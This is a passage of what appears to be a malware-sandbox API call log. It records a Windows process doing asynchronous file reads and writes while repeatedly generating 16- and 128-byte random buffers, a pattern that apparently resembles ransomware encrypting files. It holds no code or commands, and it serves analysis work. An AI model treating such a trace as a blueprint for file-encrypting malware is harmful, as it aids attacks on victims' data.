(_Block=0x3df0008) [0159.038] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.055] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa9e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.070] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.081] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f8a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.103] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.103] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.103] free (_Block=0x3e305b8) [0159.103] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.103] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.104] free (_Block=0x1fa91d0) [0159.104] free (_Block=0x1fa2ed8) [0159.104] free (_Block=0x1fa90b8) [0159.104] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.127] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x5a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0159.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.129] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.130] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.130] free (_Block=0x3e305b8) [0159.130] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.130] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.130] free (_Block=0x1fa91d0) [0159.130] free (_Block=0x1fa2ed8) [0159.130] free (_Block=0x1fa90b8) [0159.130] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.130] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.131] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.193] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa497, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.211] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.211] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.211] free (_Block=0x3e305b8) [0159.211] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.211] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.212] free (_Block=0x1fa91d0) [0159.212] free (_Block=0x1fa2ed8) [0159.212] free (_Block=0x1fa90b8) [0159.212] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.220] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.258] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.258] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.258] free (_Block=0x3e305b8) [0159.258] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.258] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.258] free (_Block=0x1fa91d0) [0159.258] free (_Block=0x1fa2ed8) [0159.258] free (_Block=0x1fa90b8) [0159.258] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.272] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.272] free (_Block=0x3e305b8) [0159.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.272] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.273] free (_Block=0x1fa91d0) [0159.273] free (_Block=0x1fa2ed8) [0159.273] free (_Block=0x1fa90b8) [0159.273] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0159.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.286] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.286] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.286] free (_Block=0x3e305b8) [0159.287] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.287] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.287] free (_Block=0x1fa91d0) [0159.287] free (_Block=0x1fa2ed8) [0159.287] free (_Block=0x1fa90b8) [0159.287] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.287] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.297] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.298] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.298] free (_Block=0x3e305b8) [0159.298] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.298] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.298] free (_Block=0x1fa91d0) [0159.299] free (_Block=0x1fa2ed8) [0159.299] free (_Block=0x1fa90b8) [0159.299] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0159.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.402] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x10be0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0159.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.417] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1ce60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.417] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.427] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x16730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.436] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1f870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0159.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.449] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1b840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.453] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1df50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0159.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.470] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x184e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0159.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0159.485] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.485] free (_Block=0x3e305b8) [0159.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.485] free (_Block=0x1fa91d0) [0159.485] free (_Block=0x1fa2ed8) [0159.485] free (_Block=0x1fa90b8) [0159.485] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.487] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1abb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0159.489] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x16540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.265] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x13e1d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0160.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.349] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1531c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.364] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ad37, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.380] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x178d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.382] CloseHandle (hObject=0x308) returned 1 [0160.382] free (_Block=0x3df0008) [0160.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.391] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.392] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.392] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.392] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.392] free (_Block=0x3e305b8) [0160.392] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.392] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.393] free (_Block=0x1fa91d0) [0160.393] free (_Block=0x1fa2ed8) [0160.393] free (_Block=0x1fa90b8) [0160.393] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.394] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.408] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15a7f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | 